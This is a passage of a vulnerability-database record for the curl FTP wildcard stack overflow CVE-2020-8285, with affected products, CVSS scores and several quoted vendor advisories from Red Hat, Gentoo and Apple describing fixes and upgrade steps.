        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "model": "communications cloud native core policy",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "1.14.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2020-8285",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-8285",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-186410",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-8285",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-8285",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-756",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-186410",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-8285",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing. HAXX libcurl is an open source client-side URL transfer library developed by Haxx (HAXX) in Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. A security vulnerability exists in libcurl that could be exploited by an attacker to trigger a fatal error via libcurl\u0027s FTP wildcards, thereby triggering a denial of service. A security issue was found in curl versions 7.21.0 up to and including 7.73.0. libcurl offers a wildcard matching functionality, which allows a callback (set with CURLOPT_CHUNK_BGN_FUNCTION) to return information back to libcurl on how to handle a specific entry in a directory when libcurl iterates over a list of all available entries. When this callback returns CURL_CHUNK_BGN_FUNC_SKIP, to tell libcurl to not deal with that file, the internal function in libcurl then calls itself recursively to handle the next directory entry. If there\u0027s a sufficient amount of file entries and if the callback returns \"skip\" enough number of times, libcurl runs out of stack space. The exact amount will of course vary with platforms, compilers and other environmental factors. The content of the remote directory is not kept on the stack, so it seems hard for the malicious user to control exactly what data that overwrites the stack - however it remains a Denial-Of-Service vector as a malicious user who controls a server that a libcurl-using application works with under these premises can trigger a crash. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.4 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability\nengineers face as they work across a range of public and private cloud\nenvironments. \nClusters and applications are all visible and managed from a single\nconsole\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor\nthis release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.2/html/release_notes/\n\nSecurity fixes:\n\n* redisgraph-tls: redis: integer overflow when configurable limit for\nmaximum supported bulk input size is too big on 32-bit platforms\n(CVE-2021-21309)\n\n* console-header-container: nodejs-netmask: improper input validation of\noctal input data (CVE-2021-28092)\n\n* console-container: nodejs-is-svg: ReDoS via malicious string\n(CVE-2021-28918)\n\nBug fixes: \n\n* RHACM 2.2.4 images (BZ# 1957254)\n\n* Enabling observability for OpenShift Container Storage with RHACM 2.2 on\nOCP 4.7 (BZ#1950832)\n\n* ACM Operator should support using the default route TLS (BZ# 1955270)\n\n* The scrolling bar for search filter does not work properly (BZ# 1956852)\n\n* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)\n\n* The proxy setup in install-config.yaml is not worked when IPI installing\nwith RHACM (BZ# 1960181)\n\n* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)\n\n* Observability Thanos store shard crashing - cannot unmarshall DNS message\n(BZ# 1967890)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7\n1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory\n1954506 - [DDF] Table does not contain data about 20 clusters. Now it\u0027s difficult to estimate CPU usage with larger clusters\n1954535 - Reinstall Submariner - No endpoints found on one cluster\n1955270 - ACM Operator should support using the default route TLS\n1956852 - The scrolling bar for search filter does not work properly\n1957254 - RHACM 2.2.4 images\n1959426 - Limits on Length of MultiClusterObservability Resource Name\n1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. \n1963128 - [DDF] Please rename this to \"Amazon Elastic Kubernetes Service\"\n1966513 - Unable to make SSH connection to a Bitbucket server\n1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. \n1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP8 security update\nAdvisory ID:       RHSA-2021:2471-01\nProduct:           Red Hat JBoss Core Services\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2471\nIssue date:        2021-06-17\nCVE Names:         CVE-2020-8169 CVE-2020-8284 CVE-2020-8285 \n                   CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 \n                   CVE-2021-22901 CVE-2021-31618 \n=====================================================================\n\n1. Summary:\n\nRed Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 8 zip\nrelease for RHEL 7, RHEL 8 and Microsoft Windows is available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages\nthat are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.37 Service Pack 7 and includes bug fixes and\nenhancements. Refer to the Release Notes for information on the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* curl: Use-after-free in TLS session handling when using OpenSSL TLS\nbackend (CVE-2021-22901)\n\n* httpd: NULL pointer dereference on specially crafted HTTP/2 request\n(CVE-2021-31618)\n\n* libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)\n\n* curl: FTP PASV command response can cause curl to connect to arbitrary\nhost (CVE-2020-8284)\n\n* curl: Malicious FTP server can trigger stack overflow when\nCURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)\n\n* curl: Inferior OCSP verification (CVE-2020-8286)\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n(CVE-2021-22890)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1847916 - CVE-2020-8169 libcurl: partial password leak over DNS on HTTP redirect\n1902667 - CVE-2020-8284 curl: FTP PASV command response can cause curl to connect to arbitrary host\n1902687 - CVE-2020-8285 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used\n1906096 - CVE-2020-8286 curl: Inferior OCSP verification\n1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer\n1941965 - CVE-2021-22890 curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n1963146 - CVE-2021-22901 curl: Use-after-free in TLS session handling when using OpenSSL TLS backend\n1968013 - CVE-2021-31618 httpd: NULL pointer dereference on specially crafted HTTP/2 request\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-8169\nhttps://access.redhat.com/security/cve/CVE-2020-8284\nhttps://access.redhat.com/security/cve/CVE-2020-8285\nhttps://access.redhat.com/security/cve/CVE-2020-8286\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22890\nhttps://access.redhat.com/security/cve/CVE-2021-22901\nhttps://access.redhat.com/security/cve/CVE-2021-31618\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.apachehttp\u0026downloadType=securityPatches\u0026version=2.4.37\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.openssl\u0026downloadType=securityPatches\u0026version=1.1.1g\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYMszstzjgjWX9erEAQgW2Q//cZOMa4KOvz7KejR03sHk7m8aMHDRdPDe\nKi6PTe99phprmuXNPOCPGFuWDXbdpAlyEx3Elt3Ah+vmpV+K7ThwXGXJkGwb6mol\n2xAFvcwxxO6GNsCl8gYW+JTG+5HYLZ/U4q3lgHId9qfzmuRRg0zwOuwZC7y7R6kP\n3H1o1WRiIKEA1oHCh3f3OizTrkOcBZsWINsJ2ggW+ZqVeve4PJH55F3JwCJbIuhd\nkUhe1QQjiANWq4m/+QkTRtIYzahqK+lIubpoU5P+sFosc7ASUGe29ZPC9LsfY4hx\n61bSxXbxTv2wcBaUrg/TAxRplQdHRbZe8s8eWhMtDoNHRqujYOiKHUnBgdoY6oLd\n3gfAGI3w2NnWRDodGDGXfuDu6hncAukvxqOO/tOnRd2n7/R52ewGCsNKvsf/OHRG\n1X7UeD4DJvXiqBNOtPaqOjR3q7xdO5MhYtkvh/8mzvhx5X/CojUWRWmtSdJDhpvQ\nPOl+hJjFqEFTUJk/VGDJ7HsIs5OqeoV0pURP3VvYyBF75xp3aYI8Gfb1wLoqXmp2\niFhSTskqEc42iMvG/Ks5Rb1wQLrJ4RNgxunGofmNQusjgN406aAqvE79a6JUmt/z\n7Z6i8Tvy9PGgNtbnalyxbikpA8Qcoxoij2pbIcSNIJXW+mA74QtI3AC4+4m0V90H\nbutyhmDY1nQ=\n=gsJD\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Applications using the APR libraries, such as httpd, must be\nrestarted for this update to take effect.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202012-14\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: Normal\n     Title: cURL: Multiple vulnerabilities\n      Date: December 23, 2020\n      Bugs: #737990, #759259\n        ID: 202012-14\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in cURL, the worst of which\ncould result in information disclosure or data loss. \n\nBackground\n==========\n\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n=================\n\n     -------------------------------------------------------------------\n      Package              /     Vulnerable     /            Unaffected\n     -------------------------------------------------------------------\n   1  net-misc/curl                \u003c 7.74.0                  \u003e= 7.74.0\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in cURL. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll cURL users should upgrade to the latest version:\n\n   # emerge --sync\n   # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.74.0\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-8231\n       https://nvd.nist.gov/vuln/detail/CVE-2020-8231\n[ 2 ] CVE-2020-8284\n       https://nvd.nist.gov/vuln/detail/CVE-2020-8284\n[ 3 ] CVE-2020-8285\n       https://nvd.nist.gov/vuln/detail/CVE-2020-8285\n[ 4 ] CVE-2020-8286\n       https://nvd.nist.gov/vuln/detail/CVE-2020-8286\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  https://security.gentoo.org/glsa/202012-14\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2021-04-26-2 macOS Big Sur 11.3\n\nmacOS Big Sur 11.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT212325. \n\nAPFS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1853: Gary Nield of ECSC Group plc and Tim\nMichaud(@TimGMichaud) of Zoom Video Communications\n\nAppleMobileFileIntegrity\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to bypass Privacy\npreferences\nDescription: An issue in code signature validation was addressed with\nimproved checks. \nCVE-2021-1849: Siguza\n\nApple Neural Engine\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1867: Zuozhi Fan (@pattern_F_) and Wish Wu(\u5434\u6f4d\u6d60) of Ant Group\nTianqiong Security Lab\n\nArchive Utility\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1810: an anonymous researcher\n\nAudio\nAvailable for: macOS Big Sur\nImpact: An application may be able to read restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\nCFNetwork\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1857: an anonymous researcher\n\nCoreAudio\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted audio file may disclose\nrestricted memory\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\nCoreAudio\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to read restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\nCoreFoundation\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: A validation issue was addressed with improved logic. \nCVE-2021-30659: Thijs Alkemade of Computest\n\nCoreGraphics\nAvailable for: macOS Big Sur\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1847: Xuwei Liu of Purdue University\n\nCoreText\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted font may result in the\ndisclosure of process memory\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\ncurl\nAvailable for: macOS Big Sur\nImpact: An attacker may provide a fraudulent OCSP response that would\nappear valid\nDescription: This issue was addressed with improved checks. \nCVE-2020-8286: an anonymous researcher\n\ncurl\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A buffer overflow was addressed with improved input\nvalidation. \nCVE-2020-8285: xnynx\n\nDiskArbitration\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to modify protected parts\nof the file system\nDescription: A permissions issue existed in DiskArbitration. This was\naddressed with additional ownership checks. \nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl\n(@theevilbit) of Offensive Security, and an anonymous researcher\n\nFaceTime\nAvailable for: macOS Big Sur\nImpact: Muting a CallKit call while ringing may not result in mute\nbeing enabled\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1872: Siraj Zaneer of Facebook\n\nFontParser\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-1881: an anonymous researcher, Xingwei Lin of Ant Security\nLight-Year Lab, Mickey Jin of Trend Micro, and Hou JingYi\n(@hjy79425575) of Qihoo 360\n\nFoundation\nAvailable for: macOS Big Sur\nImpact: An application may be able to gain elevated privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\nFoundation\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to gain root privileges\nDescription: A validation issue was addressed with improved logic. \nCVE-2021-1813: Cees Elzinga\n\nHeimdal\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted server messages may lead to\nheap corruption\nDescription: This issue was addressed with improved checks. \nCVE-2021-1883: Gabe Kirkpatrick (@gabe_k)\n\nHeimdal\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A race condition was addressed with improved locking. \nCVE-2021-1884: Gabe Kirkpatrick (@gabe_k)\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-1880: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30653: Ye Zhang of Baidu Security\nCVE-2021-1814: Ye Zhang of Baidu Security, Mickey Jin \u0026 Qi Sun of\nTrend Micro, and  Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-1843: Ye Zhang of Baidu Security\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-1885: CFF of Topsec Alpha Team\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2021-1858: Mickey Jin of Trend Micro\n\nInstaller\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: This issue was addressed with improved handling of file\nmetadata. \nCVE-2021-30658: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nIntel Graphics Driver\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2021-1841: Jack Dates of RET2 Systems, Inc. \nCVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day\nInitiative\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to disclose kernel memory\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1860: @0xalsr\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong\nSecurity Lab\n\nKernel\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1851: @0xalsr\n\nKernel\nAvailable for: macOS Big Sur\nImpact: Copied files may not have the expected file permissions\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-1832: an anonymous researcher\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to disclose kernel memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-30660: Alex Plaskett\n\nlibxpc\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to gain root privileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2021-30652: James Hutchins\n\nlibxslt\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted file may lead to heap\ncorruption\nDescription: A double free issue was addressed with improved memory\nmanagement. \nCVE-2021-1875: Found by OSS-Fuzz\n\nLogin Window\nAvailable for: macOS Big Sur\nImpact: A malicious application with root privileges may be able to\naccess private information\nDescription: This issue was addressed with improved entitlements. \nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nNotes\nAvailable for: macOS Big Sur\nImpact: Locked Notes content may have been unexpectedly unlocked\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1859: Syed Ali Shuja (@SyedAliShuja) of Colour King Pvt. Ltd\n\nNSRemoteView\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-1876: Matthew Denton of Google Chrome\n\nPreferences\nAvailable for: macOS Big Sur\nImpact: A local user may be able to modify protected parts of the\nfile system\nDescription: A parsing issue in the handling of directory paths was\naddressed with improved path validation. \nCVE-2021-1815: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nSafari\nAvailable for: macOS Big Sur\nImpact: A malicious website may be able to track users by setting\nstate in a cache\nDescription: An issue existed in determining cache occupancy. The\nissue was addressed through improved logic. \nCVE-2021-1861: Konstantinos Solomos of University of Illinois at\nChicago\n\nSafari\nAvailable for: macOS Big Sur\nImpact: A malicious website may be able to force unnecessary network\nconnections to fetch its favicon\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1855: H\u00e5vard Mikkelsen Ottestad of HASMAC AS\n\nSampleAnalysis\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-1868: Tim Michaud of Zoom Communications\n\nsmbx\nAvailable for: macOS Big Sur\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: An integer overflow was addressed with improved input\nvalidation. \nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos\n(talosintelligence.com)\n\nSystem Preferences\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-30657: an anonymous researcher\n\ntcpdump\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2020-8037: an anonymous researcher\n\nTime Machine\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications\nand Gary Nield of ECSC Group plc\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to a\ncross site scripting attack\nDescription: An input validation issue was addressed with improved\ninput validation. \nCVE-2021-1825: Alex Camboe of Aon\u2019s Cyber Solutions\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2021-1817: an anonymous researcher\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\nuniversal cross site scripting\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2021-1826: an anonymous researcher\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2021-1820: an anonymous researcher\n\nWebKit Storage\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited. \nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-30661: yangkang(@dnpushme) of 360 ATA\n\nWebRTC\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause unexpected system\ntermination or corrupt kernel memory\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2020-7463: Megan2013678\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to cause unexpected system\ntermination or write kernel memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong\nSecurity Lab\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2021-1829: Tielei Wang of Pangu Lab\n\nWi-Fi\nAvailable for: macOS Big Sur\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: The issue was addressed with improved permissions logic. \nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim\nMichaud(@TimGMichaud) of Zoom Video Communications and Wojciech\nRegu\u0142a (@_r3ggi) 